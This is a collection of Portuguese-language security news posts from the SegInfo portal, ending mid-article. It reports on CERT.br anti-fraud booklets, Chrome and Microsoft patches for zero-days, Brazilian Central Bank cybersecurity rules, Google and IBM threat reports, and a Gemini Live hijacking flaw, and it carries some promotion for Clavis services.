O Centro de Estudos, Resposta e Tratamento de Incidentes de Segurança no Brasil (CERT.br) anunciou o lançamento de novos fascículos da Cartilha de Segurança para Internet, com foco na prevenção de golpes e fraudes no ambiente digital.

As publicações, intituladas “Golpes: Não se Deixe Enganar” e “Golpes: Evite Fraudes”, apresentam, de forma didática, as principais estratégias utilizadas por criminosos, além de orientações práticas para que usuários possam se proteger.

Os materiais destacam o papel central da engenharia social nos ataques atuais, explorando emoções como medo, urgência e ganância para induzir vítimas a tomar decisões precipitadas. Esse tipo de abordagem está diretamente relacionado a golpes como phishing e fraudes digitais, amplamente explorados em cenários reais.

Além disso, o CERT.br alerta para o uso crescente de tecnologias como inteligência artificial e deepfakes, que tornam os golpes mais sofisticados e difíceis de identificar — um cenário que reforça a necessidade de educação contínua em segurança digital.

O primeiro fascículo busca desenvolver o senso crítico dos usuários, incentivando uma postura baseada em três princípios: “Desconfie. Informe-se. Verifique”. Já o segundo reúne medidas práticas de prevenção, com foco na proteção de contas, transações financeiras e identidade digital.

Entre as recomendações, estão a verificação de informações por canais oficiais e a atenção redobrada a mensagens suspeitas — mesmo quando aparentam vir de contatos conhecidos. O material também chama atenção para golpes financeiros cada vez mais comuns, como fraudes envolvendo Pix e uso indevido de dados pessoais.

Além dos fascículos, o CERT.br ampliou a iniciativa “Cidadão na Rede”, com novos vídeos educativos que apresentam sinais de golpes online e boas práticas para um uso mais seguro da internet.

A Cartilha de Segurança para Internet é uma referência consolidada no Brasil e reforça um ponto central: tecnologia sozinha não resolve o problema — a conscientização do usuário é uma camada crítica de defesa.

Conheça o Blog Clavis, e aprofunde seu conhecimento contra golpes, através de conteúdos práticos e atualizados

Para complementar as orientações apresentadas pelo CERT.br, o blog da Clavis reúne conteúdos que aprofundam boas práticas de segurança e ajudam a reduzir riscos no dia a dia digital — conectando teoria e aplicação prática em cenários reais.

Entre os temas abordados, destacam-se:

• • Dicas práticas para identificar golpes e tentativas de phishing em diferentes canais;
  
• • Boas práticas para proteção de dados pessoais e prevenção de fraudes;
  
• • Estratégias para entender e mitigar ataques baseados em engenharia social;
  
• • Recomendações para fortalecer a segurança de acessos, identidades e contas digitais.

Acesse o blog da Clavis e confira conteúdos completos para fortalecer sua segurança digital.

Para saber mais, clique aqui.

The post CERT.br lança novos fascículos da Cartilha de Segurança com foco na prevenção de golpes e fraudes online appeared first on SegInfo - Portal, Podcast e Evento sobre Segurança da Informação.

O Google anunciou a atualização do Chrome 146, que corrige 21 vulnerabilidades de segurança, incluindo uma falha zero-day já explorada ativamente em ataques reais.

De acordo com o advisory divulgado pela empresa, a nova versão do navegador corrige 19 vulnerabilidades classificadas como de alta severidade e duas de severidade média.

A falha explorada está identificada como CVE-2026-5281 e foi descrita como um problema do tipo use-after-free no Dawn, camada gráfica do Chrome.

Segundo o Google, já existem evidências de exploração ativa dessa vulnerabilidade:
“Google is aware that an exploit for CVE-2026-5281 exists in the wild”.

A empresa não divulgou detalhes sobre os ataques que exploram a CVE-2026-5281. No entanto, vulnerabilidades desse tipo são frequentemente utilizadas em cenários de sandbox escape ou arbitrary code execution, permitindo que atacantes comprometam sistemas de forma mais ampla.

O zero-day foi reportado por um pesquisador anônimo, que também foi creditado por outra vulnerabilidade de alta severidade — CVE-2026-5284, também classificada como use-after-free no Dawn. Até o momento, não há indícios de exploração ativa dessa segunda falha.

Este é o quarto zero-day corrigido no Chrome em 2026, após as vulnerabilidades CVE-2026-2441, CVE-2026-3909 e CVE-2026-3910.

Todas as 21 vulnerabilidades corrigidas nesta atualização foram reportadas ao Google ao longo do mês de março. A empresa ainda não definiu os valores de bug bounty que serão pagos aos pesquisadores responsáveis pelas descobertas.

Para saber mais, clique aqui.

The post Zero-day explorado está entre 21 vulnerabilidades corrigidas no Chrome appeared first on SegInfo - Portal, Podcast e Evento sobre Segurança da Informação.

Durante a RSA Conference 2026, líderes do U.S. Cyber Command (CYBERCOM), ligado à National Security Agency (NSA), chamaram atenção para a importância crescente da cibersegurança no setor privado como elemento central da segurança nacional. O painel reuniu os quatro últimos diretores do comando para discutir como os conflitos cibernéticos têm evoluído e impactado governos e empresas.

O debate abordou principalmente os efeitos da ciberguerra sobre estruturas econômicas, políticas e sociais. Segundo os especialistas, ataques recentes têm priorizado serviços essenciais — como energia, abastecimento de água, sistemas financeiros e transporte — com potencial de gerar interrupções significativas e efeitos em cadeia.

Na avaliação dos ex-diretores, todos militares reformados dos Estados Unidos, adversários geopolíticos têm direcionado suas ações para comprometer operações críticas, explorando fragilidades que podem desestabilizar países sem a necessidade de confrontos tradicionais. Esse cenário pressiona governos a acelerar a evolução de suas estratégias de defesa digital.

Nos Estados Unidos, onde cerca de 85% da infraestrutura crítica é operada por empresas privadas, o risco ganha uma dimensão adicional. Ataques a organizações podem provocar impactos comparáveis aos sofridos por instituições governamentais, evidenciando uma mudança no foco das ameaças cibernéticas.

O General Keith Alexander, primeiro diretor do CYBERCOM, relembrou que a criação do comando, em 2008, foi impulsionada pela identificação de malwares em redes classificadas do governo. Segundo ele, a crescente dispersão de dados e sistemas tornou a proteção ainda mais desafiadora ao longo dos anos.

Cooperação entre governo e empresas

Os participantes destacaram que a atuação governamental isolada não é suficiente para lidar com o atual nível de risco. A maturidade em segurança da informação por parte das empresas e a cooperação com o setor público são consideradas fundamentais para fortalecer a resiliência cibernética.

Para o Almirante Mike Rogers, segundo diretor do CYBERCOM, o setor privado já reconhece a necessidade de investir em segurança para garantir a continuidade das operações. No entanto, ele ressalta que os governos precisam avançar no tratamento do tema, indo além de diretrizes e boas práticas, com abordagens mais estruturadas e, possivelmente, regulatórias.

O almirante também comparou os efeitos de ataques cibernéticos a ações militares convencionais, destacando que o impacto pode ser equivalente em determinados cenários — o que exige uma resposta proporcional em termos de prioridade e preparo.

Experiência operacional e novos desafios

Outro ponto enfatizado foi o valor da experiência acumulada em operações cibernéticas ofensivas. Segundo o General Paul Nakasone, atividades conduzidas em regiões como Oriente Médio contribuíram para o desenvolvimento de conhecimento estratégico sobre ameaças digitais e formas de mitigação, especialmente diante de países como Rússia e China.

Além disso, os diretores alertaram para o papel das tecnologias emergentes, como a inteligência artificial, no cenário de segurança. O uso dessas ferramentas tende a ampliar tanto capacidades defensivas quanto ofensivas, exigindo atenção redobrada das organizações.

Para o General Tim Haugh, atual diretor do CYBERCOM, o desafio agora é garantir que a inovação tecnológica seja utilizada de forma segura, preservando a integridade de sistemas críticos e a estabilidade da sociedade em um ambiente cada vez mais complexo.

Para saber mais, clique aqui.

The post Diretores da NSA destacam papel da cibersegurança corporativa na segurança nacional appeared first on SegInfo - Portal, Podcast e Evento sobre Segurança da Informação.

O sistema financeiro brasileiro registrou 12 milhões de indícios de fraude ao longo de 2025, segundo levantamento da Quod com base em dados do Registro Unificado de Fraudes (Rufra). O número representa um crescimento expressivo em relação ao ano anterior e reforça a escalada das fraudes no país.

Um dos principais fatores para esse aumento está na ampliação do compartilhamento de informações entre instituições financeiras, impulsionado por exigências regulatórias mais recentes. Com maior adesão ao sistema e aumento da visibilidade, o volume de registros cresce, ao mesmo tempo em que evidencia a dimensão real do problema.

Os dados também mostram a recorrência das ocorrências: milhões de consumidores foram alvo de tentativas repetidas, indicando que os fraudadores operam de forma contínua e direcionada. Além disso, a concentração de casos em faixas etárias mais jovens reforça a necessidade de estratégias específicas de prevenção e conscientização.

Esse cenário reflete uma combinação de fatores. De um lado, há o avanço dos mecanismos de detecção e monitoramento, com uso crescente de inteligência analítica e integração de bases de dados. De outro, observa-se a evolução das táticas utilizadas por criminosos, que exploram credenciais vazadas, engenharia social e brechas em processos digitais.

Para as instituições, o recado é claro: a fraude deixou de ser um evento isolado e passou a operar em escala industrial. Isso exige uma abordagem mais estruturada, baseada em inteligência, correlação de eventos e resposta contínua.

Medidas como autenticação multifator, monitoramento transacional em tempo real, validação robusta de identidade e integração com bases externas de fraude tornam-se cada vez mais essenciais. Além disso, a capacidade de compartilhar informações de forma segura entre organizações passa a ser um diferencial crítico na redução de riscos.

O aumento dos indícios de fraude não representa apenas um crescimento das tentativas, mas também uma mudança no nível de maturidade do ecossistema financeiro — que passa a enxergar, com mais clareza, a extensão e a complexidade das ameaças.

Para saber mais, clique aqui.

The post Sistema financeiro registra 12 milhões de indícios de fraude em 2025 appeared first on SegInfo - Portal, Podcast e Evento sobre Segurança da Informação.

As novas regras do Banco Central para segurança cibernética já estão em vigor e trazem mudanças relevantes para instituições financeiras, especialmente no que diz respeito à governança, controle de riscos e proteção de ambientes críticos.

As exigências estão formalizadas na Resolução BCB nº 538/2025 e na Resolução CMN nº 5.274/2025, que reforçam a necessidade de uma abordagem mais estruturada, em que a segurança deixa de ser apenas técnica e passa a exigir processos contínuos, evidências e rastreabilidade.

Segurança passa a ser tratada como processo contínuo

Com as novas exigências, as instituições precisam garantir não apenas a implementação de controles, mas também sua manutenção, monitoramento e comprovação de efetividade.

Isso inclui práticas como:

• Gestão contínua de vulnerabilidades;
• Registro e retenção de logs;
• Controle de acessos e revisões periódicas;
• Uso de autenticação multifator;
• Proteção de dados com criptografia;
• Monitoramento de ameaças.

A exigência passa a ser menos sobre “ter controles” e mais sobre demonstrar que eles funcionam ao longo do tempo.

Maior atenção a terceiros e desenvolvimento de sistemas

Outro ponto reforçado é a responsabilidade sobre sistemas desenvolvidos internamente e por terceiros. As instituições devem garantir requisitos de segurança em todo o ciclo de vida das aplicações, incluindo integrações e uso de novas tecnologias.

Na prática, isso amplia a necessidade de controle sobre:

• Fornecedores e parceiros;
• Sistemas adquiridos ou integrados;
• Processos de desenvolvimento seguro.

Esse cenário aumenta a complexidade da gestão de riscos, especialmente em ambientes híbridos e baseados em nuvem.

Pix e STR passam a exigir controles mais rigorosos

Ambientes conectados à Rede do Sistema Financeiro Nacional (RSFN), como Pix e STR, passam a ter exigências mais restritivas.

Entre os principais pontos estão:

• Autenticação multifator para acessos administrativos;
• Isolamento de ambientes críticos;
• Controle reforçado de credenciais e certificados digitais;
• Validação de integridade das transações.

Esses sistemas passam a ser tratados como infraestrutura crítica, exigindo maior nível de proteção e monitoramento.

Pentest anual e evidências ganham peso regulatório

As normas também consolidam a obrigatoriedade de testes de invasão com periodicidade mínima anual, com necessidade de documentação formal dos resultados e dos planos de ação.

Isso reforça o papel do pentest como parte da governança de segurança, e não apenas como atividade técnica pontual.

Adequação exige integração entre segurança e governança

Com as regras já em vigor, a adequação passa a exigir uma visão integrada entre Segurança da Informação, gestão de riscos e conformidade.

Para muitas instituições, o desafio está em estruturar processos que sejam sustentáveis, auditáveis e aderentes às exigências regulatórias ao longo do tempo.

Nesse contexto, iniciativas de GRC ganham protagonismo, permitindo organizar controles, evidências e gestão de riscos de forma centralizada.

A Clavis apoia instituições nesse processo por meio de serviços de adequação às normas do Banco Central, incluindo diagnóstico de aderência (Gap Analysis), gestão de vulnerabilidades, execução de pentest com documentação auditável e estruturação de processos de governança e conformidade.

Com o novo cenário regulatório, a capacidade de demonstrar controle e resiliência passa a ser tão relevante quanto a própria implementação de medidas de segurança.

Para saber mais, clique aqui.

The post Novas exigências do Banco Central para segurança cibernética já estão em vigor e ampliam responsabilidades no setor financeiro appeared first on SegInfo - Portal, Podcast e Evento sobre Segurança da Informação.

Um estudo recente da Quest Software revela que uma parcela relevante das organizações ainda não valida de forma consistente sua capacidade de recuperação após incidentes de segurança. De acordo com o relatório State of ITDR, 24% das empresas afirmam nunca testar seus planos de disaster recovery, evidenciando lacunas importantes na preparação para cenários de crise.

A pesquisa ouviu 650 profissionais de TI e Segurança da Informação e analisa práticas relacionadas a Identity Threat Detection and Response (ITDR), em um contexto de aumento da complexidade operacional e expansão das superfícies de ataque.

Recuperação ainda não é prioridade em muitas organizações

Apesar do avanço de controles preventivos, os dados indicam que a etapa de recuperação ainda recebe menos atenção do que deveria. A ausência de testes regulares pode comprometer diretamente a capacidade de resposta em situações reais, especialmente em incidentes que envolvem indisponibilidade de sistemas, comprometimento de credenciais ou vazamento de dados.

Do ponto de vista de governança, isso evidencia uma fragilidade na integração entre gestão de riscos, continuidade de negócios e Segurança da Informação — pilares que deveriam atuar de forma coordenada.

Identidade digital amplia a superfície de ataque

O relatório também reforça que a identidade continua sendo um dos principais pontos de exposição nas organizações. A multiplicidade de identidades distribuídas entre ambientes on-premises, cloud e híbridos aumenta a complexidade da gestão de acessos.

Além disso, o crescimento acelerado de identidades não humanas — como contas de serviço, aplicações e automações — tem ampliado os desafios de controle. Em muitos cenários, essas identidades já superam em volume os usuários humanos, dificultando a visibilidade e o monitoramento.

Entre os respondentes, mais da metade aponta esse tipo de identidade como uma das áreas mais difíceis de proteger, seguida por contas de terceiros e sistemas legados.

IA impulsiona ameaças e também soluções

O uso de inteligência artificial também aparece como um fator relevante no cenário atual. O relatório destaca o aumento de ataques automatizados, manipulação de dados e novos vetores associados ao uso de IA.

Ao mesmo tempo, a tecnologia é vista como aliada: 79% dos entrevistados acreditam que soluções baseadas em IA podem aumentar a eficácia das estratégias de ITDR, principalmente na detecção de comportamentos anômalos e resposta a incidentes.

Adoção de ITDR cresce, mas maturidade ainda é desigual

A pesquisa aponta avanço na adoção de práticas de ITDR, com 57% das organizações afirmando já utilizar esse tipo de abordagem, um crescimento em relação ao ano anterior.

Apesar disso, desafios persistem, especialmente na obtenção de visibilidade completa sobre o ambiente de identidades e na gestão de riscos em infraestruturas distribuídas.

Falta de integração entre prevenção e recuperação

Um dos principais pontos de atenção levantados pelo estudo é o desequilíbrio entre investimentos em prevenção e preparação para resposta e recuperação. Muitas organizações continuam priorizando controles de proteção, sem garantir que processos de recuperação estejam devidamente testados e atualizados.

Nesse cenário, frameworks como o NIST Cybersecurity Framework ganham relevância ao propor uma abordagem integrada, baseada em funções como identificar, proteger, detectar, responder e recuperar.

Ambientes OT exigem atenção adicional

Em ambientes de tecnologia operacional (OT), esse cenário tende a ser ainda mais crítico. Nesses contextos, testes de disaster recovery frequentemente não são realizados ou se limitam a simulações básicas, voltadas apenas ao cumprimento de requisitos formais.

A ausência de validações mais robustas pode ampliar o impacto de incidentes, especialmente em operações que dependem de disponibilidade contínua e possuem maior complexidade para execução de testes completos.

GRC como base para resiliência

Diante desse cenário, especialistas apontam que a evolução da maturidade em segurança passa necessariamente pelo fortalecimento de práticas de Governança, Risco e Compliance (GRC).

A adoção de soluções estruturadas, como as oferecidas pela Clavis Segurança da Informação, permite às organizações integrar:

• Gestão de riscos cibernéticos;
• Mapeamento de ativos e identidades;
• Definição e acompanhamento de controles;
• Aderência a frameworks como NIST e ISO 27001;
• Monitoramento contínuo de conformidade.
  

Além disso, iniciativas como Gap Analysis e auditorias técnicas contribuem para validar, na prática, a capacidade de resposta e recuperação diante de incidentes.

Necessidade de evolução contínua

Os dados do estudo indicam que, embora haja avanço na adoção de estratégias de detecção e resposta, ainda existe uma lacuna significativa na preparação para cenários de recuperação.

Em um ambiente onde ataques se tornam mais frequentes e sofisticados, a capacidade de restaurar operações de forma rápida e segura passa a ser tão crítica quanto prevenir incidentes — exigindo uma abordagem mais integrada entre segurança, governança e continuidade.

Para saber mais, clique aqui.

The post Levantamento aponta baixa maturidade em testes de disaster recovery e reforça desafios em segurança de identidade appeared first on SegInfo - Portal, Podcast e Evento sobre Segurança da Informação.

A Microsoft divulgou as atualizações de segurança do Patch Tuesday de março de 2026, corrigindo 79 vulnerabilidades em diferentes produtos da empresa. Entre as falhas resolvidas estão duas vulnerabilidades zero-day divulgadas publicamente, além de problemas críticos que afetam aplicações amplamente utilizadas, como componentes do Microsoft Office.

De acordo com a empresa, o pacote de correções inclui três vulnerabilidades classificadas como críticas, duas delas relacionadas à execução remota de código (RCE) e outra associada à exposição de informações sensíveis.

Falhas abrangem diferentes categorias de risco

As vulnerabilidades corrigidas neste ciclo de atualizações abrangem diversas categorias de segurança. Entre elas estão:

• 46 falhas de elevação de privilégios
• 18 vulnerabilidades de execução remota de código
• 10 problemas de divulgação de informação
• 4 vulnerabilidades de negação de serviço
• 4 falhas de spoofing
• 2 vulnerabilidades de bypass de mecanismos de segurança

Esse conjunto de correções reforça a importância da gestão contínua de patches em ambientes corporativos, especialmente em infraestruturas que utilizam amplamente produtos Microsoft.

Zero-days já haviam sido divulgadas publicamente

As duas vulnerabilidades zero-day corrigidas neste Patch Tuesday já haviam sido divulgadas publicamente antes da liberação das atualizações. A primeira vulnerabilidade, identificada como CVE-2026-21262, afeta o Microsoft SQL Server. A falha pode permitir que um usuário autenticado eleve privilégios por meio de acesso via rede, obtendo permissões administrativas no ambiente de banco de dados. O problema foi identificado pelo pesquisador de segurança Erland Sommarskog.

A segunda falha, CVE-2026-26127, está relacionada à plataforma .NET e pode ser explorada para provocar negação de serviço, explorando um erro de leitura fora dos limites de memória.

Vulnerabilidades de execução remota no Microsoft Office

O pacote Microsoft Office também recebeu correções relevantes neste ciclo de atualizações. Duas vulnerabilidades de execução remota de código, identificadas como CVE-2026-26110 e CVE-2026-26113, podem ser exploradas através do painel de pré-visualização de arquivos.

Esse tipo de vulnerabilidade pode representar risco significativo em cenários de ataques baseados em documentos maliciosos distribuídos por e-mail ou outras plataformas de compartilhamento de arquivos.

Falha no Excel pode permitir exfiltração de dados via Copilot

Outra vulnerabilidade destacada nas atualizações é a CVE-2026-26144, que afeta o Microsoft Excel e pode permitir a exfiltração de dados através do Microsoft Copilot.

De acordo com a Microsoft, um atacante poderia explorar a falha para induzir o modo Agent do Copilot a enviar dados por conexões de rede não previstas, criando um possível cenário de exposição de informações sem interação do usuário.

O caso ilustra desafios emergentes relacionados à segurança de ferramentas baseadas em inteligência artificial integradas a aplicações corporativas.

Atualizações devem ser aplicadas rapidamente

Especialistas recomendam que organizações e usuários instalem as atualizações de segurança o mais rápido possível para reduzir a superfície de ataque e minimizar o risco de exploração dessas vulnerabilidades.

Em ambientes corporativos, a aplicação rápida de patches continua sendo uma das medidas mais importantes para mitigar riscos associados a falhas de segurança em softwares amplamente utilizados.

The post Patch Tuesday de março corrige 79 vulnerabilidades em produtos Microsoft, incluindo duas falhas zero-day appeared first on SegInfo - Portal, Podcast e Evento sobre Segurança da Informação.

O Senado Federal aprovou em 24 de fevereiro a Medida Provisória nº 1.317/2025, que altera a estrutura institucional da Autoridade Nacional de Proteção de Dados (ANPD). Com a medida, o órgão passa a ser formalmente reconhecido como Agência Nacional de Proteção de Dados, com autonomia funcional, técnica, administrativa e financeira. 

A mudança representa um avanço na consolidação da governança de proteção de dados no Brasil e pode fortalecer a capacidade do país de lidar com riscos associados ao uso intensivo de dados pessoais no ambiente digital.

Reforço institucional da autoridade de dados

A transformação da ANPD em agência reguladora federal amplia sua autonomia e fortalece sua posição dentro da estrutura administrativa do Estado. Na prática, isso tende a ampliar a capacidade de atuação do órgão em atividades como regulação, fiscalização e aplicação da Lei Geral de Proteção de Dados (LGPD).

Autoridades de proteção de dados com maior autonomia institucional são consideradas um elemento importante para garantir a efetividade de legislações de privacidade. No contexto da Segurança da Informação, o fortalecimento da estrutura regulatória também contribui para ampliar a pressão por boas práticas de governança de dados, gestão de riscos e proteção de informações sensíveis.

Nova carreira para regulação e fiscalização

Entre os pontos previstos na medida está a criação da Carreira de Regulação e Fiscalização de Proteção de Dados, com cargos efetivos de Especialista em Regulação de Proteção de Dados.

A iniciativa busca ampliar a capacidade técnica da autoridade reguladora, permitindo atuação especializada em atividades como:

• Elaboração de normas e diretrizes regulatórias;
• Fiscalização de organizações públicas e privadas;
• Realização de auditorias e análises técnicas;
• Estudos sobre riscos associados ao tratamento de dados pessoais;
• Implementação de políticas públicas voltadas à proteção de dados.

Do ponto de vista da Segurança da Informação, o fortalecimento técnico da autoridade reguladora pode contribuir para elevar o nível de maturidade das organizações brasileiras em práticas como gestão de incidentes, proteção de dados sensíveis e controles de segurança aplicados ao tratamento de informações pessoais.

Novas atribuições no ambiente digital

A reestruturação da ANPD também ocorre em um contexto de ampliação de responsabilidades relacionadas à proteção de direitos no ambiente digital.

O Decreto nº 12.622/2025 atribui à autoridade de dados funções relacionadas à implementação do chamado Estatuto Digital da Criança e do Adolescente, ampliando o papel da instituição na supervisão de atividades online que envolvem dados de menores.

Esse cenário aumenta a complexidade regulatória envolvendo plataformas digitais, aplicações online e serviços baseados em dados, exigindo mecanismos mais robustos de fiscalização e acompanhamento por parte da autoridade reguladora.

Impactos para organizações e gestão de riscos

Com uma estrutura institucional mais consolidada, a expectativa é que a agência amplie sua capacidade de atuação em temas como monitoramento de incidentes de segurança, fiscalização do tratamento de dados pessoais e análise de práticas adotadas por empresas e órgãos públicos.

Para organizações que lidam com grandes volumes de dados, especialmente em ambientes digitais, isso reforça a necessidade de fortalecer programas de governança de dados, privacidade e Segurança da Informação, incluindo medidas como controles de acesso, gestão de vulnerabilidades e resposta a incidentes.

A consolidação da agência reguladora também tende a trazer maior previsibilidade regulatória para empresas que buscam adequação à LGPD e às normas complementares relacionadas ao tratamento de dados.

Para saber mais, clique aqui.

The post Senado aprova MP que transforma ANPD em agência reguladora e reforça fiscalização de proteção de dados appeared first on SegInfo - Portal, Podcast e Evento sobre Segurança da Informação.

O Google revelou que 90 vulnerabilidades do tipo zero-day foram exploradas ativamente em 2025, e quase metade delas teve como alvo tecnologias utilizadas em ambientes corporativos. Os dados fazem parte de um relatório divulgado pelo Google Threat Intelligence Group (GTIG), que analisa tendências globais de exploração de falhas críticas.

Segundo a empresa, o número de zero-days observados em 2025 foi superior ao registrado em 2024, quando foram identificadas 78 vulnerabilidades exploradas, mas inferior ao total de 100 casos registrados em 2023.

Principais fornecedores afetados

Entre os fornecedores impactados, a Microsoft concentrou a maior parte das vulnerabilidades exploradas, com 25 zero-days. Na sequência aparecem Google (11), Apple (8) e Cisco (4).

Os sistemas operacionais — tanto desktop quanto mobile — continuaram sendo o principal alvo, representando 44% das vulnerabilidades exploradas em 2025, um aumento em relação aos 40% registrados em 2024.

Exploração em dispositivos móveis cresce

O relatório também aponta um crescimento na exploração de zero-days em dispositivos móveis. Em 2024 foram identificadas 9 vulnerabilidades desse tipo, enquanto em 2025 o número subiu para 15.

De acordo com o Google, em diversos casos os atacantes encadearam três ou mais vulnerabilidades para alcançar um único objetivo, técnica comum em ataques mais complexos que buscam contornar camadas de segurança.

Menos falhas em navegadores — mas ataques mais sofisticados

O número de zero-days relacionados a navegadores continua em queda. Embora isso possa indicar avanços na segurança dessas plataformas, também pode sugerir que os ataques estão se tornando mais sofisticados e difíceis de detectar, segundo o relatório.

Spyware comercial lidera exploração de zero-days

Das 90 vulnerabilidades exploradas em 2025, 42 puderam ser atribuídas a algum ator de ameaça específico.

Pela primeira vez, fornecedores comerciais de vigilância (Commercial Surveillance Vendors – CSV) lideraram o uso de zero-days. Empresas desse setor — responsáveis pelo desenvolvimento de ferramentas de spyware — exploraram 15 vulnerabilidades, enquanto outras três foram classificadas como “provavelmente associadas” a esse tipo de fornecedor.

Já grupos de ciberespionagem patrocinados por Estados foram responsáveis pela exploração de 12 zero-days, com três outras vulnerabilidades possivelmente ligadas a esse tipo de operação. Uma parcela significativa desses ataques foi associada a grupos com ligação à China.

Segundo o Google, a tendência observada ao longo da última década permanece: grupos ligados à República Popular da China continuam entre os usuários mais ativos de vulnerabilidades zero-day.

“Grupos associados à China, como UNC5221 e UNC3886, continuam focando fortemente em dispositivos de segurança e equipamentos de borda para manter acesso persistente a alvos estratégicos”, destacou a empresa.

Tecnologias corporativas cada vez mais visadas

O relatório destaca ainda que 43 das vulnerabilidades exploradas em 2025 afetaram tecnologias corporativas, o que representa quase metade do total — o maior nível já registrado.

Muitos dos ataques tiveram como alvo equipamentos de rede e dispositivos de segurança, frequentemente utilizados como porta de entrada inicial para comprometimento de ambientes corporativos.

Segundo o Google, esse movimento evidencia o risco representado pela infraestrutura de borda confiável, como firewalls, gateways e appliances de segurança.

“A exploração crescente de dispositivos de rede e segurança evidencia o risco crítico associado à infraestrutura de borda confiável, enquanto ataques a softwares corporativos demonstram o valor de plataformas altamente interconectadas que oferecem acesso privilegiado a redes e ativos de dados”, explica o relatório.

IA deve influenciar ataques e defesa em 2026

O Google também projeta que a inteligência artificial terá papel cada vez mais relevante no cenário de vulnerabilidades em 2026.

Atacantes podem utilizar IA para acelerar a descoberta de falhas e o desenvolvimento de exploits, enquanto equipes de defesa podem aplicar a tecnologia para identificar vulnerabilidades desconhecidas e neutralizá-las antes que sejam exploradas.

Esse cenário reforça a importância de monitoramento contínuo, gestão de vulnerabilidades e estratégias de segurança proativas, especialmente em ambientes corporativos cada vez mais dependentes de infraestruturas interconectadas.

Para saber mais, clique aqui.

The post Google: quase metade dos zero-days explorados em 2025 teve como alvo empresas appeared first on SegInfo - Portal, Podcast e Evento sobre Segurança da Informação.

Uma vulnerabilidade no Google Chrome poderia ter permitido que extensões maliciosas sequestrassem o assistente de inteligência artificial do navegador, o Gemini Live, para espionar usuários e exfiltrar dados. A falha foi identificada pela Palo Alto Networks e corrigida em janeiro, na versão 143 do navegador.

O Gemini Live é o assistente de IA integrado ao painel lateral do Chrome, projetado para auxiliar usuários na navegação. Entre suas funcionalidades estão o resumo de conteúdos em tempo real, a execução automática de tarefas específicas e o apoio na compreensão contextual da página ativa.

De acordo com a Palo Alto Networks, ao conceder à IA acesso direto e privilegiado ao ambiente de navegação, os chamados “AI browsers” passam a ser capazes de realizar operações complexas e em múltiplas etapas — algo que antes exigia diversas extensões ou ações manuais do usuário.

Para funcionar como previsto, o assistente de IA visualiza o conteúdo exibido na tela e utiliza a página acessada como contexto para executar instruções. No entanto, esse nível ampliado de acesso também introduz novos riscos de segurança.

Detalhes da vulnerabilidade

Rastreada como CVE-2026-0628, a falha poderia permitir que extensões maliciosas injetassem código JavaScript diretamente no painel do Gemini Live.

Segundo a Palo Alto Networks, a exploração exigiria que a extensão tivesse acesso a um conjunto específico de permissões por meio da API declarativeNetRequests, que permite interceptar e modificar requisições e respostas HTTPS. Esse recurso foi criado para finalidades legítimas, como bloquear solicitações maliciosas ou intrusivas, e é habilitado por padrão para permitir que extensões interajam com conteúdos originados do Gemini carregados na aba do site.

A vulnerabilidade impactava a interação com os conteúdos carregados no painel do Gemini, possibilitando que códigos JavaScript obtivessem acesso às capacidades da IA.

Entre essas capacidades estão a leitura de arquivos locais, captura de capturas de tela, acesso à câmera e ao microfone, além da execução de tarefas complexas. Caso explorada, a falha poderia permitir que atacantes obtivessem acesso indevido a esses recursos privilegiados.

Como o painel do Gemini Live é um componente nativo do navegador, um invasor poderia injetar código para ativar câmera e microfone sem o consentimento do usuário, acessar arquivos locais, capturar imagens das abas abertas ou ainda sequestrar o painel para conduzir ataques de phishing.

A Palo Alto Networks destaca que, como o aplicativo Gemini executa ações legítimas que exigem privilégios elevados, seu sequestro poderia conceder a extensões maliciosas acesso a recursos do sistema que normalmente não estariam disponíveis.

Correção e versões afetadas

A vulnerabilidade foi reportada ao Google em outubro. A correção foi disponibilizada nas versões Chrome 143.0.7499.192 e 143.0.7499.193 para Windows e macOS, e na versão 143.0.7499.192 para Linux.

Usuários e organizações devem garantir que seus navegadores estejam atualizados para mitigar o risco associado à CVE-2026-0628, especialmente em ambientes corporativos que fazem uso intensivo de extensões e recursos baseados em inteligência artificial.

Para saber mais, clique aqui.

The post Vulnerabilidade permitia sequestro do assistente de IA Gemini Live no Chrome appeared first on SegInfo - Portal, Podcast e Evento sobre Segurança da Informação.

A IBM divulgou o relatório 2026 X-Force Threat Intelligence Index, apontando um cenário de escalada nos ataques cibernéticos impulsionados pelo uso de Inteligência Artificial (IA). De acordo com o estudo, criminosos estão explorando falhas básicas de segurança em ritmo acelerado, utilizando ferramentas de IA para identificar vulnerabilidades com maior rapidez e eficiência.

O IBM X-Force registrou um aumento de 44% nos ataques iniciados pela exploração de aplicações expostas à internet, em grande parte devido à ausência de controles adequados de autenticação e ao uso de IA na descoberta automatizada de vulnerabilidades.

Exploração de vulnerabilidades lidera vetores de ataque

Entre os principais destaques do relatório:

• • Grupos ativos de ransomware e extorsão cresceram 49% em relação ao ano anterior, refletindo a fragmentação do ecossistema criminoso. O número de vítimas divulgadas publicamente também aumentou cerca de 12%.
• • Comprometimentos relevantes de cadeias de suprimentos e terceiros quase quadruplicaram desde 2020, com atacantes explorando ambientes de desenvolvimento, pipelines de CI/CD e integrações com soluções SaaS.
• • A exploração de vulnerabilidades tornou-se a principal causa de incidentes, representando 40% dos ataques observados pelo X-Force em 2025.**

Segundo Mark Hughes, Global Managing Partner de Cybersecurity Services da IBM, os criminosos não estão reinventando suas estratégias, mas acelerando-as com o uso de IA:

“Os atacantes não estão reinventando seus playbooks, estão acelerando-os com IA. O problema central continua sendo o mesmo: empresas estão sobrecarregadas por vulnerabilidades de software. A diferença agora é a velocidade. Com tantas falhas que não exigem credenciais, os atacantes conseguem ir diretamente da varredura ao impacto. Líderes de segurança precisam adotar uma abordagem mais proativa, utilizando detecção e resposta a ameaças baseadas em IA para identificar lacunas antes que os ataques escalem.”

O problema crescente de identidade na era da IA

O relatório também chama atenção para o risco crescente envolvendo plataformas de IA. Em 2025, malwares do tipo infostealer foram responsáveis pela exposição de mais de 300 mil credenciais do ChatGPT, indicando que soluções baseadas em IA já enfrentam riscos semelhantes aos de outras aplicações corporativas SaaS.

O comprometimento de credenciais de chatbots vai além do simples acesso indevido a contas. Entre os riscos identificados estão:

• • Manipulação de respostas geradas por IA;
• • Exfiltração de dados sensíveis;
• • Inserção de prompts maliciosos para alterar comportamentos dos modelos.

O cenário reforça a necessidade de avaliar o uso corporativo de IA em escala organizacional, implementando autenticação forte, controle de acesso condicional e monitoramento contínuo.

Fragmentação do ransomware e automação de ataques

O X-Force observou um aumento de 49% no número de grupos ativos de ransomware em 2025. Parte desse crescimento está associada a operadores menores e transitórios, cujas campanhas de baixo volume dificultam atribuição e resposta coordenada.

